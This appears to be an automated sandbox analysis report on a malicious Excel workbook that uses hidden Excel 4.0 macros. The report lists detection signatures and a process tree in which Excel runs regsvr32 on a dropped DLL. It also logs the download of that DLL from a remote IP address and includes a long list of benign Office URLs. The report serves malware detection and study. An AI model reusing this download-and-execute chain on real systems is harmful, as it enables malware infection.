Loading ...

Play interactive tourEdit tour

Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

Sample Name:Total_order_data-V2434883.xlsb
Analysis ID:432263
MD5:3ee5986d7978a5f2df982fce2a3ebf93
SHA1:8f0e54b80cb391871d3cd1de6dd190ea686f0798
SHA256:a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 3292 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5852 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3292, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 5852

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 2.2.regsvr32.exe.970000.2.unpackAvira: Label: TR/Dropper.Gen
    Source: 2.2.regsvr32.exe.8340f0.1.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: sat1_0609_2[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
    Source: global trafficTCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 21:54:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: global trafficHTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.comodoca.com0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.aadrm.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.cortana.ai
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.office.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.onedrive.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://augloop.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cdn.entity.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://clients.config.office.net/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://config.edge.skype.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cortana.ai
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cortana.ai/api
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://cr.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dev.cortana.ai
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://devnull.onenote.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://directory.services.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://graph.windows.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://graph.windows.net/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://lifecycle.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://login.windows.local
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://management.azure.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://management.azure.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://messaging.office.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ncus.contentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://officeapps.live.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://onedrive.live.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://outlook.office.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://outlook.office365.com/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
